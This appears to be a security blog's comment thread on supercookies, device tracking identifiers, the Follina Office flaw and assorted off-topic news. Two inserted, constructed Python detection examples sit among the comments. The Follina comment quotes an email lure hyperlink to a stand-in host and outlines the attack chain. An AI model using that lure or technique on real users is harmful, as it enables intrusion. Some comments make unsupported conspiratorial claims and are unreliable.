“Opt Out” does not work, the tracking ID is permanent (it’s in the fine print)

“TURN, an online advertising company that is common on Google, Facebook, and Yahoo, was using the Verizon supercookie to retrieve and revive deleted cookies. These “zombie-cookies” were overriding users’ opt-out preferences.”
https://www.techdirt.com/2015/01/15/remember-that-undeletable-super-cookie-verizon-claimed-wouldnt-be-abused-yeah-well-funny-story/

“the opt-out mechanism for browsing is browser and device specific. That means you must opt out for each browser on each device that you use.”

“Finally, clearing or deleting your browser’s cookies ‘may inadvertently delete the Turn opt-out cookie, and you may need to renew your opt-out choice for that browser,’ the company notes. Likewise, you’ll have to opt out all over again if you reset your device’s advertising identifier.”

This does not work either, ‘device advertising identifiers’ are easily aggregated.

https://clark.com/technology/verizon-supercookie-turn-inc-opt-out/

Vodafone has done it before…

August 20, 2015

“The American privacy organisation Access Now has conducted an international investigation into the use of supercookies and has discovered that Vodafone is using them on its Dutch network, the paper says.”

After a great deal of fuss, the technology is no longer used in the US, Access Now says. But its use has moved to other countries, including Spain, Canada, Peru and the Netherlands.
https://www.expatica.com/nl/uncategorized/dn-dutch-vodafone-brings-supercookies-to-the-netherlands-4705/

Verizon’s supercookie scheme…

August 17, 2015

AT&T and Verizon were able to track their customers—even when users were roaming internationally or activated private browsing modes—by injecting code called tracking headers into the data sent from users’ devices.
https://www.theatlantic.com/politics/archive/2015/08/how-phone-companies-used-supercookies-to-track-customers-web-browsing/458016/

Oct. 30, 2014

“The data can be used by any site – even those with no relationship to the telecoms — to build a dossier about a person’s behavior on mobile devices – including which apps they use, what sites they visit and for how long.”
https://www.propublica.org/article/somebodys-already-using-verizons-id-to-track-users

“inserting a string of about 50 letters, numbers, and characters into data flowing between these customers and the websites they visit”
https://www.wired.com/2014/10/verizons-perma-cookie/

March 7, 2016

For the past three years, Verizon has been using a so-called ‘supercookie’ to track users and sell this information to outside advertising partners. Now, the FCC is levying a $1.35 million fine and requiring Verizon to offer consumers the ability to opt-out of its various tracking programs.

For two years, the supercookie — which is actually called Unique Identifier Header, or UIDH — program tracked users in secret using technology similar to a tracking cookie — only this tracking cookie couldn’t be cleared.

Verizon started using the UIDH program in 2012 to serve better-targeted ads on its own advertising platforms. It wasn’t until 2014 when Verizon first made mention of its use of supercookies by burying the information on an FAQ page.
https://thenextweb.com/news/fcc-drops-the-hammer-on-verizon-over-supercookie-usage

Am I Being Tracked
https://www.accessnow.org/aibt/

the use of tracking headers worldwide and our recommendations for governments, carriers, websites, intergovernmental bodies, and researchers
https://www.accessnow.org/cms/assets/uploads/archive/AIBT-Report.pdf

Supercookies can restore the data of your deleted cookies and link the data with new ones. They can access your login credentials, image and file caches, and plug-in data. Ad blockers can’t block them, and you can’t clear them by deleting your browser history and cache data. You can’t simply delete supercookies.
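An added example, not part of the comment above and not code from any carrier or from Access Now: the header injection described in the quoted articles can be checked for by sending a request with known headers over plain HTTP to an echo server you control and diffing what arrives. The header-name list, host names and sample request are constructed assumptions; the page itself names only Verizon's UIDH.

```python
import re

# Carrier identifier headers that have been reported publicly. This list is an
# assumption of the example (the page names only UIDH) and is not exhaustive.
KNOWN_TRACKING_HEADERS = {"x-uidh", "x-acr", "x-msisdn", "x-up-subno"}
# Headers ordinary proxies add in transit: they reveal a middlebox, not an ID.
PROXY_HEADERS = {"via", "x-forwarded-for", "forwarded"}
# Long opaque token, like the "about 50 letters, numbers, and characters" quoted above.
TOKEN_RE = re.compile(r"^[A-Za-z0-9+/=_\-]{32,}$")


def parse_request_headers(raw: bytes) -> dict:
    """Parse the header block of a raw HTTP/1.x request into {lowercase name: value}."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def find_injected(sent: dict, received: dict) -> list:
    """Return (header, verdict) for each header that arrived at the server but
    was never sent by the client, or arrived with a different value."""
    sent = {k.lower(): v for k, v in sent.items()}
    findings = []
    for name, value in sorted(received.items()):
        if sent.get(name) == value:
            continue  # arrived exactly as sent
        if name in sent:
            verdict = "modified-in-transit"
        elif name in KNOWN_TRACKING_HEADERS:
            verdict = "known-tracking-header"
        elif name in PROXY_HEADERS:
            verdict = "proxy-header"
        elif TOKEN_RE.match(value):
            verdict = "unknown-opaque-identifier"
        else:
            verdict = "unknown-added-header"
        findings.append((name, verdict))
    return findings


# Constructed sample: what the client sent ...
SENT = {"Host": "echo.example", "User-Agent": "header-check/1.0", "Accept": "*/*"}

# ... and what the echo server logged for the same request (constructed bytes).
RECEIVED_RAW = (
    b"GET /echo HTTP/1.1\r\n"
    b"Host: echo.example\r\n"
    b"User-Agent: header-check/1.0\r\n"
    b"Accept: */*\r\n"
    b"Via: 1.1 proxy.example\r\n"
    b"X-UIDH: CONSTRUCTEDTOKEN0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\r\n"
    b"X-Sub-Ref: a1b2c3d4e5f60718293a4b5c6d7e8f9012345678\r\n"
    b"\r\n"
)

# The same request arriving untouched, for comparison (constructed).
CLEAN_RAW = (
    b"GET /echo HTTP/1.1\r\n"
    b"Host: echo.example\r\n"
    b"User-Agent: header-check/1.0\r\n"
    b"Accept: */*\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for name, verdict in find_injected(SENT, parse_request_headers(RECEIVED_RAW)):
        print(f"{name}: {verdict}")
```

The check has to run over unencrypted HTTP on the mobile data connection: a request inside TLS cannot have headers added by the carrier, so an HTTPS test would always come back clean.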

ResearcherZero May 31, 2022 3:08 AM

“Roughly 17,000 Android apps collect identifying information that creates a permanent record of the activity on your device”
https://www.cnet.com/tech/mobile/these-android-apps-have-been-tracking-you-even-when-you-say-stop/

identifiers

To keep track of who is who, trackers need identifiers that are unique, persistent, and available. In other words, a tracker is looking for information (1) that points only to you or your device, (2) that won’t change, and (3) that it has easy access to.
https://www.eff.org/wp/behind-the-one-way-mirror#Part1

even devices with MAC randomization usually share static MAC addresses when they actually connect to a wireless hotspot or Bluetooth device
https://www.eff.org/wp/behind-the-one-way-mirror#Part2

“With enough beacons in enough places, companies can track users’ movement around stores or around a city. They can also identify when two people are in the same location and use that information to build a social graph.”
https://conferences.sigcomm.org/imc/2013/papers/imc148-barberaSP106.pdf

“Don’t bridge Advertising ID resets.”
https://developer.android.com/training/articles/user-data-ids

“…if reset, a new advertising identifier must not be connected to a previous advertising identifier or data derived from a previous advertising identifier without the explicit consent of the user.”

Your app must be a device or profile owner app, have special carrier permissions, or have the READ_PRIVILEGED_PHONE_STATE privileged permission in order to access these identifiers.

fraud prevention services also use hardware identifiers, SSAID, MAC address, IMEI, etc.,

ResearcherZero May 31, 2022 3:23 AM

@Ted

I’d like to know what options are available

You could use one of those magic covers that block microwave and wireless emissions. Obviously the phone will not work while inside one of these housings.

Key Identifiers for Mobile Devices
https://citizenlab.ca/2015/05/the-many-identifiers-in-our-pocket-a-primer-on-mobile-privacy-and-security/

https://citizenlab.ca/wp-content/uploads/2015/05/The-Many-Identifiers-in-Our-Pockets-A-primer-on-mobile-privacy-and-security-_reportPDF.pdf

“From a privacy perspective Microsoft Edge and Yandex are qualitatively different from the other browsers studied. Both send persistent identifiers that can be used to link requests (and associated IP address/location) to back-end servers.”
https://www.scss.tcd.ie/Doug.Leith/pubs/browser_privacy.pdf

ResearcherZero May 31, 2022 4:21 AM

Follina (CVE-2022-30190)

Two days ago, Nao_sec identified an odd looking Word document in the wild, uploaded from an IP address in Belarus:

The document uses the Word remote template feature to retrieve a HTML file from a remote webserver, which in turn uses the ms-msdt MSProtocol URI scheme to load some code and execute some PowerShell.

That should not be possible.

the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled. Protected View does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View.

I’m calling it Follina because the spotted sample on the file references 0438, which is the area code of Follina in Italy.

As an example, you can send an email with this text as a hyperlink:

ms-excel:ofv|u|https://blah.com/poc.xls

And Outlook will gladly let the user click the hyperlink and open the Excel document. You can even change the text to be something friendly, like “Invoice”. Because the document isn’t attached to the email, and the URI doesn’t start with http or https, most email gateways are going to let that sucker straight through as nothing appears malicious.
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e

Microsoft has now revealed the CVE identifier for this vulnerability is CVE-2022-30190

If utilizing Microsoft Defender’s Attack Surface Reduction (ASR) rules in your environment, activating the rule “Block all Office applications from creating child processes” in Block mode will prevent this from being exploited. However, if you’re not yet using ASR you may wish to run the rule in Audit mode first and monitor the outcome to ensure there’s no adverse impact on end users.

Another option is to remove the file type association for ms-msdt (can be done in Windows Registry HKCR:\ms-msdt or with Kelvin Tegelaar’s PowerShell snippet). When the malicious document is opened, Office will not be able to invoke ms-msdt thus preventing the malware from running. Be sure to make a backup of the registry settings before using this mitigation.
https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
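An added example, not code from the quoted posts, Microsoft or Huntress: detection logic in Python for the two defensive signals quoted above, an Office application spawning a child process (msdt.exe in particular) and an e-mail hyperlink whose scheme is not http or https. The event field names, the allow-list and all sample data are constructed assumptions.

```python
import re

# Office applications whose child processes the quoted ASR rule blocks
# (process names chosen for this example).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Allow-list for hyperlink schemes in mail bodies (assumption of this example).
ALLOWED_LINK_SCHEMES = {"http", "https", "mailto"}

HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_process_event(event: dict) -> list:
    """Return the reasons a process-creation event deserves a look.
    Expects keys parent_image, image and command_line (constructed schema)."""
    reasons = []
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    command_line = event.get("command_line", "").lower()
    if parent in OFFICE_PARENTS:
        reasons.append("office-spawned-child")
        if child == "msdt.exe":
            reasons.append("office-spawned-msdt")
    # Assumes the URI handler passes the full ms-msdt: URI to msdt.exe as an
    # argument, so this also fires when the parent is not an Office process.
    if child == "msdt.exe" and "ms-msdt:" in command_line:
        reasons.append("msdt-launched-via-uri-handler")
    return reasons


def suspicious_links(html_body: str) -> list:
    """Return (scheme, target) for every href whose scheme is off the allow-list.
    Relative links have no scheme and are ignored."""
    flagged = []
    for target in HREF_RE.findall(html_body):
        match = SCHEME_RE.match(target.strip())
        if match and match.group(1).lower() not in ALLOWED_LINK_SCHEMES:
            flagged.append((match.group(1).lower(), target))
    return flagged


# Constructed process-creation events (not real telemetry).
EVENTS = [
    {   # Word starting the support tool through the protocol handler
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\msdt.exe",
        "command_line": r'"C:\Windows\System32\msdt.exe" ms-msdt:<arguments elided>',
    },
    {   # A user opening Word from the shell: nothing to report
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "command_line": r'"WINWORD.EXE" /n "C:\Users\alice\Documents\report.docx"',
    },
    {   # A legitimate Office child (print helper): why Audit mode comes first
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "image": r"C:\Windows\splwow64.exe",
        "command_line": r"C:\Windows\splwow64.exe 8192",
    },
]

# Constructed mail body using the hyperlink form quoted in the comment above.
MAIL_HTML = (
    '<p>Please see <a href="ms-excel:ofv|u|https://blah.com/poc.xls">Invoice</a>, '
    'our <a href="https://example.com/help">help page</a> or '
    '<a href="/relative/page">this page</a>.</p>'
)

if __name__ == "__main__":
    for event in EVENTS:
        print(basename(event["image"]), triage_process_event(event))
    print(suspicious_links(MAIL_HTML))
```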

ResearcherZero May 31, 2022 4:32 AM

@Ted

To be precise, what you want is a Faraday Bag:

“intertwined copper and plastic layers insures the same signal-blocking effects”

“In a nutshell, Faraday bags grant you the benefit of having the protection that NATO operatives have, but in a light and portable form factor.”

“The fact that you can take this security with you anywhere without raising suspicions is yet another advantage.”

“People around you will think that you’re carrying a cheap nylon wallet or some sort of common bag.”
https://privacypros.io/faraday-bags/

Most of those EMF protective covers are crap and don’t work.

Winter May 31, 2022 4:33 AM

@All
How Firefox tries to limit/block supercookies

ht-tps://blog.mozilla.org/security/2021/01/26/supercookie-protections/

Ted May 31, 2022 6:51 AM

@ResearcherZero

To be precise, what you want is a Faraday Bag:

I don’t know if I would count on any technology to help me “safely” break the law. But it’s an interesting thought.

I’d probably feel better taking a legal and/or political approach. But it wouldn’t surprise me if a few technology companies get their fingers slammed in the door on this issue.

GrandInquisitor May 31, 2022 8:56 AM

That was not advertising. I am referencing the platform where the squidcontent is from.

I thought they stopped operating due to petty infighting long ago.

Isengrim Bolger-Baggins May 31, 2022 8:58 PM

== Guardian launches Tor onion service

“The Guardian website is now available to Tor users as an “onion service”, at the address:

https://www.guardian2zotagl6tmjucg3lrhxdk4dw3lhbqnkvvkywawy3oqfoprid.onion

The Tor network helps conceal its users’ locations, which makes tracking their internet activity much more difficult. Tor also makes it harder for internet service providers to identify what their users are accessing. This means users can bypass censorship in parts of the world where access to independent news might be difficult or if certain websites and services are banned.

Guardian readers have always been able to access https://www.theguardian.com using tools such as Tor Browser. These browsers route their communications over the Tor network – thereby concealing the reader’s location. But the browsers’ communications have to exit the Tor network for the final leg of the journey in order to get to the site on the normal world wide web.

The introduction of a Guardian onion service means that the entire communication pathway between a reader and the Guardian takes place within the Tor network, thereby avoiding potential risks with the “hop” between the Tor network and the world wide web service. An example of such a risk could be that the “exit node” – the gateway between the normal web and the Tor network – could contain malicious software or be located somewhere that is subject to censorship.”

Article: https://www.theguardian.com/help/insideguardian/2022/may/30/guardian-launches-tor-onion-service

== Two other large news sites of note also have .onion addresses:

BBC: https://www.bbcnewsd73hkzno2ini43t4gblxvycyac5aw4gnv7t2rccijh7745uqd.onion/
NYTimes: https://www.nytimesn7cgmftshazwhfgzm37qxb44r64ytbb2dj3x62d2lljsciiyd.onion/

JonKnowsNothing May 31, 2022 11:34 PM

@All

re: Leaking the SCOTUS wrecking documents

MSM reports that in pursuit of the Leaker of the soon-to-be published SCOTUS ruling on the health and well being of 50% of the US population inhabiting 50% of the landmass of the USA, the US Supreme Court Clerks “may be required” to hand over their phone records.

An interesting development..

1) IF they have a warrant they do not need the permission of the clerks to get their phone records and anything else that happens electronically, just as the same information is open season on everyone in the USA.

2) IF there was indication of something globally, most LEAs don’t even need a warrant for that.

3) Presumption of Guilty by Dunking. If you have nothing to hide….

4) Some clerks are beginning to question the part of their job ensuring “equal justice under the law” and realize it’s time to get a lawyer.

5) There are other suspects in the usual roundup of Colonel Mustard in the Copy Room with the Staple Remover: the nine supreme court justices, certain staffers and other administrative officers within the court.

RL anecdote, tl;dr

While in a discussion of reliability and honesty with a high placed Banking Executive, they relayed the following War Story.

A shortage was found in the bank tellers’ money counts. It was intermittent but clearly someone was fiddling the numbers. The question was which of the bank tellers was it.

A bank investigator was brought in and the Bank Executive sat in on the interviews while each bank teller was questioned about the shortages.

After all the interviews were completed, the investigator asked the Bank Executive which person did he think was responsible. The Bank Executive defended all the tellers especially one that had been with the company the longest and had the highest reputation.

The investigator asked for that person to return for another interview. It wasn’t long before the person admitted they had taken the funds.

The Bank Executive was dumbfounded.

  “I trusted you!”

“Exactly so”, said the investigator.

===

Search Terms

US Supreme Court Clerks

Hand over phone records

SpaceLifeForm June 1, 2022 1:51 AM

@ JonKnowsNothing

re: Leaking the SCOTUS wrecking documents

Much Ado About Nothing

As I can not identify any crime that was committed, that would explain why there is an ask for the phone records. Otherwise, a warrant would be in play.

I am not familiar with any copying machines that require a cell phone in order to use. I am not saying they do not exist.

Overall, it does appear to be an interesting Witches Cauldron Brew.

Colonel Eye of Newt apparently has some recipe in mind.

ResearcherZero June 1, 2022 2:48 AM

@Ted

Politicians might find a Faraday Bag handy. In Australia at least, if you are ever giving evidence in a corruption inquiry, they will quite happily put a hit on you. So it could be handy when they are meeting with corrupt cops, bribing prosecutors, or perhaps a judge or two. Though I already have all the evidence (certified and replicated in a dead-drop), so they are rather f**cked in that regard.

And it just so happens…

Australia to get new federal anti-corruption body after previous government loses election and gets the boot.

“It will be a national anti-corruption commission with teeth, which will have independent investigative powers and which will be real in opposition to the model that has been rejected by all.”

The issue becomes even more relevant following new research published by the Centre for Public Integrity’s group of independent experts questioning the $55 billion spent by the Morrison government on grants over the past four years.

The investigation found that there was little or no oversight in how the money was spent.

“since 2012, corruption in Australia – if we read the reports and data from international organisations and universities – is increasing.”
https://www.sbs.com.au/language/english/our-democracy-is-disintegrating-federal-icac-top-of-list-for-senate-candidate-yolanda-vega

The Old Model

“unlike a royal commission, the CIC would lack the power to hold public hearings”

Referrals in the public division can only be made by certain individuals including the Attorney-General, the responsible minister for the agency investigated, Commonwealth Integrity Office Holders and certain parliamentarians.

Investigations in the law enforcement division can be referred by anyone — including members of the public.

The powers to hold public hearings and publish findings also differ significantly between the two divisions.

Hearings relating to the law enforcement division would be held in public. In contrast, hearings relating to the public sector division, including politicians and their staffers, “must be held in private”, the government’s bill says.
https://www.ag.gov.au/system/files/2020-11/cic-bill-exposure-draft.pdf

Comparing the CIC with royal commissions appears to have first been raised by then attorney-general Christian Porter in November 2020.

Mr Porter said the CIC would have “greater investigatory powers than a Royal Commission”.
https://webarchive.nla.gov.au/awa/20210325234831/https://www.attorneygeneral.gov.au/media/media-releases/release-commonwealth-integrity-commission-consultation-draft-2-november-2020

The Corruption Commission Act was dropped despite government promises in recent years to introduce one.
However, while the powers were intended to be extremely limited, the facade of appearing transparent has now been dropped.

“If text messages calling the Prime Minister a liar, a psychopath and a horrible person could be broadcast publicly so easily, it would be a nightmare for our federal politicians to have an actual body dedicated to exposing corruption,” Cash said.

“That’s why we’d much rather break campaign promises than have politicians come out on blatant corruption, as you can imagine.”

“Imagine if that stuff got to the media.”
https://apdaweb.org/federal-government-scraps-icac-law-after-seeing-how-easy-it-is-for-people-to-get-their-text-messages-the-betoota-advocate/

Angelos June 1, 2022 6:10 AM

Bruce Schneier and 25 other leading computer scientists and academics have signed a letter to US lawmakers, urging them to crack down on the cryptocurrencies industry.

The letter can be read here:
https://concerned.tech/

Mentions on Stephen Diehl’s Twitter account:
https://twitter.com/smdiehl/status/1531920898944602114?s=20&t=y97oTuAVJ8jonUkIg1u23w

A snip from the letter:
By its very design, blockchain technology, specifically so-called “public blockchains”, are poorly suited for just about every purpose currently touted as a present or potential source of public benefit. From its inception, this technology has been a solution in search of a problem and has now latched onto concepts such as financial inclusion and data transparency to justify its existence…

ResearcherZero June 1, 2022 6:41 AM

“It sounds like the stuff of science fiction: Two closely related species hybridize and create a superorganism whose growth and expansion seems unstoppable. That’s what’s happened in Western Australia’s Shark Bay, researchers say, where a seagrass meadow (see above) stemming from a single hybrid plant has extended its reach across more than 180 kilometers—an area the size of Washington, D.C.”
https://www.science.org/content/article/world-s-largest-organism-found-australia

There be squid in them waters…

Clive Robinson June 1, 2022 6:46 AM

@ SpaceLifeForm, ALL,

Re “We did verify she closed the door,”

And

… a push bar exit door can be enabled to not lock.

May well not be the issue.

Normally doors with “push bar” exit have “auto-closers”, because they are “emergency doors”. Mostly where adults and teenagers are they will be strong enough for them to close the door fully if well maintained.

However where under teens are involved such auto-closers are insufficient to close a door fully unless it can build up sufficient inertia in the door. That is the door closers are set at a way lower force for two reasons,

1, So children can push them open in emergencies.
2, So that the close pressure will not bruise, break, or amputate children’s fingers by normal accidental closure (another letting the door go).

Now consider you are in a building and you hear shots being fired as military training will tell you slightly counter intuitively you are actually better off “outside the building in cover as you do not get pinned down” or as was once put to me “cornered like a rat in a trap”

Or as my father who was soldier in WWII once rather memorably told me,

“The place to be when there is trouble, is somewhere else.”

He also explained how basic situational awareness helps you spot when things are “brewing up” and it’s time to get out of the heat and be cool about it.

Some people have a “sixth sense” thus are naturally situational aware. Most teachers of children and parents find when their children are infants and above they develop a sixth sense they did not have before at a subconscious level.

We get told about the “Fight or Flight” response and it makes it sound like a binary option to an immediate threat. It’s actually not true some animals have a faint response to being startled, this is not just some breeds of goat, but possums and smaller rodents like mice. As well as several others where their primary predators “respond to movement” as they only go for “live prey” so appearing dead to a high degree is actually a counterintuitive survival response.

So some humans have learnt by luck, intuition or training to use another counterintuitive tactic which is to not hide, but move slowly away before the attacker pounce response is activated. This “avoidance” response will cause some people to cross open space to gain distance and seek cover by which their further avoidance response will be covered so they do not get attacked.

So consider, you have heard both the vehicle crash and the initial shots at people up the street. That is enough to make the more astute drop into “avoidance response”.

So you leave carefully and quietly and without sudden movement.

Thus you would open the door slowly exit low and hold it as it closed so it would not make much movement and no noise to attract attention.

Yes you have “closed the door” but there is insufficient force on the door for the push-bar to re-lock unless you actually push it. If you have closed the door quietly, you are unlikely to give it a shove as that would create noise. Also if you are halfway smart, you would realise you might have to retreat back through it…

I’m not saying this happened, because I don’t think you should go from effect “door left open” to cause “woman left it open” as that is against the scientific method.

All I’m saying is that as an “individual with agency” who has also been situationally aware from an early age[1], and later honed by training at various levels, yes I’d leave as fast as safely possible without compromising myself, I would then get “backup” and give situational information. And yes I’d probably close the door but not lock it as logically it’s the most sensible thing to do.

The reason it went wrong from what has been said is that the “backup” was not at all well trained, or had no tactical experience, so followed a plan made by a committee that cared more for defending actions in court at some future date than actually providing the sort of response required…

I think we can expect “what-aboutism” to be brought into play to say that the police behaved properly and everyone else did not, so the thin blue-line “responsible behaviour” “protect and serve” and other faux “motherhood and apple pie” image and similar nonsense can be pushed. So don’t be surprised if a bunch of commendations get handed out down the line…

[1] Try being a foot taller than many adults when you are just becoming 11 years old, you get bullied a lot not just by other children but adults as well. Just being tall even when “small” gets you bullied, especially if you are always “curious” it makes you noticed thus a target. It’s lose-lose because if you fight and put them down because you are bigger you are in the wrong, if you back down this just encourages further bullying. Thus developing good avoidance skills keeps you healthy.

[2] One other basic lesson you get taught during military training is that the way to deal with an inferior group is to hit them hard and fast as this limits their time ability to harm you, a gun fires only one bullet at a time after all, and you tend not to be that accurate in hitting targets when coming under heavy fire. I suspect the Border Patrol people not only knew that from training but exercises and possibly actual experience.

JonKnowsNothing June 1, 2022 7:33 AM

@SpaceLifeForm, @All

re: I am not familiar with any copying machines that require a cell phone in order to use.

People carry their cell phones everywhere, even to the loo, and within arms reach while taking a shower.

Getting Google et al to hand over a geofence warrant with detailed tracking might need a warrant.

Getting the CDRs is a popular fill-in-the-puzzle-piece for “who talked to whom” in the media and if there was a meet up or a dead drop or live drop of the document. That should also take a warrant if getting the CDRs direct from the provider. SCOTUS would need to know all the different providers, although they likely have all the phone numbers for all their employees and interns.

Getting the history search listing. Another popular item on the LEA list to find out who was looking up the How To Drop Off Anonymous Documents, and of side interest, if they were checking out several different drop off options and burner phones.

IANAL but I don’t think a “crime has to be committed” to get a warrant or subpoena, only that there is a “possibility of a crime” to get one. After they get the results then they can determine if there is enough data to proceed with prosecution for which a set of crimes are detailed.

I don’t know under which criminal codes pre-publishing the SCOTUS ruling would fall under but I’d guess at the least it’s like taking IP from any company and putting it out for public viewing (theft). In Tech cases, often this is done for PR extra publicity (we got a secret to tell). Might it be the same for SCOTUS?

If they had any doubts about the impact of their proposed alteration, they may have leaked it deliberately to find out how much of an uproar it was going to be?

I’d hazard a guess that’s the motivation for the leak: testing the temperature of the water in the boil pot. (1)

===

Search Terms

Seafood Boil

JonKnowsNothing June 1, 2022 8:13 AM

@ResearcherZero

re: seagrass meadow stemming from a single hybrid plant

The original mono-culture.

It’s a bit humbling that a plant like this can survive millennia while the rest of the planet, including us, has undergone many alterations and extinctions because we are just not suited to a particular environment.

Yet for every still living plant or creature, our genetics trace back to the same primordial ooze. It’s a long way to Tipperary…

Leon Theremin June 1, 2022 11:50 AM

Comment on the recent shootings in the US:

There is no anonymity if you connect to 4chan using a Silicon Valley designed processor.

The “facts” that these shooters are fed are highly tailored to what they are predisposed to believe already, because the ones posting have complete surveillance of everyone (including of you who reads this – you can thank Eric Schmidt) and know exactly what to post to create a shooter.

Silicon Valley has blood on their hands. 4chan is just one of the places used for these operations. Taking it down doesn’t matter, because as long as Silicon Valley continues to spy on everybody and give the data to terrorists, innocent people will continue to be murdered.

JonKnowsNothing June 1, 2022 1:02 PM

@All

re: A Musky Ultimatum: Pretend to Work

While M. Musk still cannot dredge up the cash to conclude his Twitter buyout, he has resorted to other shenanigans to avoid paying up the $1BILL deal default fee.

He has decided to irritate everyone that works for him by claiming that His Sleep Over In The Office shows what a Great Leader He Is. He neglects to include that he no longer owns a place to sleep and has joined millions of workers couch surfing because they can’t afford the rent (1)

“Remote work is no longer acceptble [sic].”

“They should pretend to work somewhere else.”

“If you don’t show up, we will assume you have resigned.”

California is an At Will State:

  • You can be fired at any time and there doesn’t have to be a reason.
  • You are also free to quit work at any time, you don’t need to give notice.

However there are certain labor laws that get in the mix depending on whether you voluntarily left the job and under some circumstances the employer must give notice of staffing changes.

  • Unemployment Benefits
  • Health Care continuation (COBRA)
  • Vested v Unvested benefits, stock options, stock purchases, 401K

It’s possible the message would qualify for Employers Notice of Major Staffing Changes for the 100,000 employees who work at his factories.

For those that do head back to the office, it seems M.Musk is OK with “pretending to work” while spending 40 hours in a company provided cubicle.

Variations on Pretense:

  • Companies that have been insisting on their workforce returning to a fixed point, often have very long term leases and/or property investments in physical plant.
  • Companies that have remained flexible realize, they can off-site their office leasing to someone’s apartment and pocket the cost of office space, particularly in high rent locations.
  • There are also the companies that have demanded a kickback premium from their employees if they continue to work off-site: a 20% reduction in salary for letting the company use your electrical connection.

===

Search Terms:

Musk to Tesla and SpaceX workers

Be in the office 40 hours a week or quit

return to office or ‘pretend to work’ elsewhere

1) afaik, M.Musk still maintains he no longer owns a “place with personal sleeping quarters” and was couch surfing. Perhaps his ownership of SpaceX and Tesla contain equivalent rooms. Some companies do offer nap rooms and couches for employees.

RL tl;dr In the past, it was a sleeping bag under a desk. The janitors just vacuumed around your exhausted body.

SpaceLifeForm June 1, 2022 6:25 PM

Clutching Pearls

At least there was a hospital close by!

hxtps://www.nbcnews.com/news/us-news/multiple-victims-shooting-tulsa-hospital-gunman-police-say-rcna31551

Marjorie June 1, 2022 8:24 PM

@vas pup
Touring laser air defense system under development
and
Ofek spy satellites, 2 classified defense projects win top security prize

Clearly the Jewish people are very skilled with both space satellites and lasers

fib June 2, 2022 12:38 PM

@Angelos

Bruce Schneier and 25 other leading computer scientists and academics have signed a letter to US lawmakers, urging them to crack down on the cryptocurrencies industry.

Now I’m waiting for the next letter urging the Powers That Be to do something about the social media emergency[1]. They are destroying our way of life before our complacent, bovine eyes.

I can dream, can’t I?

[1] Freedom of expression is originally about what you can say with your mouth using the strength of your lungs. Giving powerful communication tools to the ordinary Joe is nowadays almost tantamount to giving everyone a nuke in a briefcase.

JonKnowsNothing June 2, 2022 5:03 PM

@Leon Theremin, @fib

re: Nothing changes until people riot.

And nothing changes much after that either.

I’m not sure anyone knows what makes things “change”. Things do change of course, but often the scale gets tipped further over.

A hum-int story about a Welsh language song that is now sung in popular events said the chorus means “We are Still Here”. That’s about the best one can hope for.

The good news is, there are a lot of people “Still Here”, even after 1,600 years of persecution.

===

Search Terms

Yma o Hyd (“Still Here”)

Dafydd Iwan Welsh-language folk singer

Clive Robinson June 2, 2022 5:08 PM

@ Moderator,

Just tried posting a reply to @Leon Theremin and @fib.

I received the 429 response, and on trying to post a second time got a ‘held for moderation’.

Has there been any progress on this overly obvious bug in the blog software behaviour?

lurker June 2, 2022 5:32 PM

@Clive, All

The HTTP 429 Too Many Requests response status code indicates the user has sent too many requests in a given amount of time (“rate limiting”).

There are Too Many Places along the route between client and server where things could happen to invoke this response. On a fast network where the client demands .img and .js in separate GETs too close. Or on a slow network where somebody isn’t waiting for ACKs. Then who knows what silliness modern routers can do in those circumstances.

The “held for moderation” I find has two principal causes: a naughty word or phrase must be spelled or insinuated differently; or it sometimes means correspondence on this subject is closed.

lurker June 2, 2022 5:40 PM

@JonKnowsNothing, 1600 years?

Depending on whose calendar, and whose script, I find a little over 6000 years.

And yes, there is a line that says it’s before they walked upright.

&ers June 2, 2022 7:08 PM

@ALL

Look who is lying and selling us all out.

hxxps://www.bleepingcomputer.com/news/security/duckduckgo-browser-allows-microsoft-trackers-due-to-search-agreement/

Maybe our host now decides to remove that “Powered by DuckDuckGo”
from this blog?

lurker June 2, 2022 7:49 PM

@&ers

My reading of the linked article is that the MS trackers only get through the iOS and Android DDG browser. It seems that DDG search on any other browser/OS combo does not yet have this problem. But as explained, the trackers are constantly morphing to get their victims . . .

&ers June 2, 2022 8:20 PM

@lurker

Today browser, tomorrow the whole search engine.
Cat is already out of the bag.
How can anyone trust them after all this?

&ers June 2, 2022 9:12 PM

@ALL

I hardly believe Microsoft pays them peanuts.
So DuckDuckGo has already taste of the money
in their mouth and it tastes good, considering
how they hid that so far.
So expect more to come.
They are already rotten.

ResearcherZero June 2, 2022 9:39 PM

@JonKnowsNothing

Elon was bullied at school. He’s just giving back. Maybe some of those school yard bullies were little girls, and perhaps he never got over it.

The IMF picks on the developing world in much the same manner, according to this obviously biased communist propaganda.

